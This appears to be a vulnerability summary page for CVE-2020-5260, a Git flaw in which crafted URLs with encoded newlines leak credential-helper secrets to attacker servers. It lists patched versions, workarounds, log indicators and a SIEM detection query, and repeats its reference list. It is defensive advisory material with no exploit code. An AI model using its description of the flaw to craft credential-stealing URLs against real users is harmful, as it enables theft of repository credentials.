CVE-2020-5260
📋 TL;DR
CVE-2020-5260 is a Git vulnerability where specially crafted URLs with encoded newlines can trick Git into sending private credentials to attacker-controlled servers. This affects Git clients using credential helpers, potentially exposing stored credentials. The vulnerability primarily impacts automated systems like Git submodules or package managers that clone URLs without user interaction.
💻 Affected Systems
- Git
📦 What is this software?
Fedora by Fedoraproject
Fedora by Fedoraproject
Fedora by Fedoraproject
Git by Git
Git by Git
Git by Git Scm
Git by Git Scm
Git by Git Scm
Git by Git Scm
Git by Git Scm
Git by Git Scm
Git by Git Scm
Git by Git Scm
Leap by Opensuse
Ubuntu Linux by Canonical
Ubuntu Linux by Canonical
Ubuntu Linux by Canonical
⚠️ Risk & Real-World Impact
Worst Case
Attackers steal credentials for any Git repository the user has access to, potentially compromising source code, CI/CD pipelines, or other systems using those credentials.
Likely Case
Credential theft from automated systems cloning malicious URLs, leading to unauthorized access to private repositories.
If Mitigated
Limited impact if systems use patched Git versions or avoid credential helpers for sensitive operations.
🎯 Exploit Status
Exploitation requires tricking users into cloning malicious URLs or affecting automated systems. Proof-of-concept code is publicly available.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.17.4, 2.18.3, 2.19.4, 2.20.3, 2.21.2, 2.22.3, 2.23.2, 2.24.2, 2.25.3, 2.26.1 or later
Vendor Advisory: https://git-scm.com/docs/git-credential
Restart Required: No
Instructions:
1. Update Git to a patched version using your package manager. 2. For Linux: Use apt-get update && apt-get upgrade git or yum update git. 3. For Windows/macOS: Download latest version from git-scm.com. 4. Verify update with git --version.
🔧 Temporary Workarounds
Disable credential helpers
allTemporarily disable credential helpers to prevent credential leakage
git config --global credential.helper ""
Use SSH instead of HTTPS
allUse SSH URLs for Git operations instead of HTTPS to avoid credential helper issues
git remote set-url origin git@github.com:user/repo.git
🧯 If You Can't Patch
- Avoid cloning untrusted Git URLs, especially in automated systems
- Monitor Git credential helper logs for suspicious activity
🔍 How to Verify
Check if Vulnerable:
Run git --version and compare with affected versions listCheck Version:
git --versionVerify Fix Applied:
Ensure Git version is 2.17.4 or higher (specific to your release branch)📡 Detection & Monitoring
Log Indicators:
- Unusual credential helper requests
- Git operations to unexpected domains
- Failed authentication attempts after credential exposure
Network Indicators:
- Git HTTPS traffic to unknown or suspicious domains
- Credential transmission to non-repository hosts
SIEM Query:
source="git.log" AND ("credential helper" OR "authentication failed")🔗 References
- http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00027.html
- http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00003.html
- http://packetstormsecurity.com/files/157250/Git-Credential-Helper-Protocol-Newline-Injection.html
- http://www.openwall.com/lists/oss-security/2020/04/15/5
- http://www.openwall.com/lists/oss-security/2020/04/15/6
- http://www.openwall.com/lists/oss-security/2020/04/20/1
- https://github.com/git/git/commit/9a6bbee8006c24b46a85d29e7b38cfa79e9ab21b
- https://github.com/git/git/security/advisories/GHSA-qm7j-c969-7j4q
- https://lists.debian.org/debian-lts-announce/2020/04/msg00010.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/74Q7WVJ6FKLIN62VS2JD2XCNWK5TNKOW/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7TVS5UG6JD3MYIGSBKMIOS6AF7CR5IPI/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MOCTR2SEHCPSCOVUQJAGFPGKFMI2VE6V/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PN3FUOXKX3AXTULYV53ACABER2W2FSOU/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XPCEOIFLLEF24L6GLVJVFZX4CREDEHDF/
- https://lore.kernel.org/git/xmqqy2qy7xn8.fsf%40gitster.c.googlers.com/
- https://security.gentoo.org/glsa/202004-13
- https://support.apple.com/kb/HT211141
- https://usn.ubuntu.com/4329-1/
- https://www.debian.org/security/2020/dsa-4657
- http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00027.html
- http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00003.html
- http://packetstormsecurity.com/files/157250/Git-Credential-Helper-Protocol-Newline-Injection.html
- http://www.openwall.com/lists/oss-security/2020/04/15/5
- http://www.openwall.com/lists/oss-security/2020/04/15/6
- http://www.openwall.com/lists/oss-security/2020/04/20/1
- https://github.com/git/git/commit/9a6bbee8006c24b46a85d29e7b38cfa79e9ab21b
- https://github.com/git/git/security/advisories/GHSA-qm7j-c969-7j4q
- https://lists.debian.org/debian-lts-announce/2020/04/msg00010.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/74Q7WVJ6FKLIN62VS2JD2XCNWK5TNKOW/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7TVS5UG6JD3MYIGSBKMIOS6AF7CR5IPI/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MOCTR2SEHCPSCOVUQJAGFPGKFMI2VE6V/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PN3FUOXKX3AXTULYV53ACABER2W2FSOU/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XPCEOIFLLEF24L6GLVJVFZX4CREDEHDF/
- https://lore.kernel.org/git/xmqqy2qy7xn8.fsf%40gitster.c.googlers.com/
- https://security.gentoo.org/glsa/202004-13
- https://support.apple.com/kb/HT211141
- https://usn.ubuntu.com/4329-1/
- https://www.debian.org/security/2020/dsa-4657
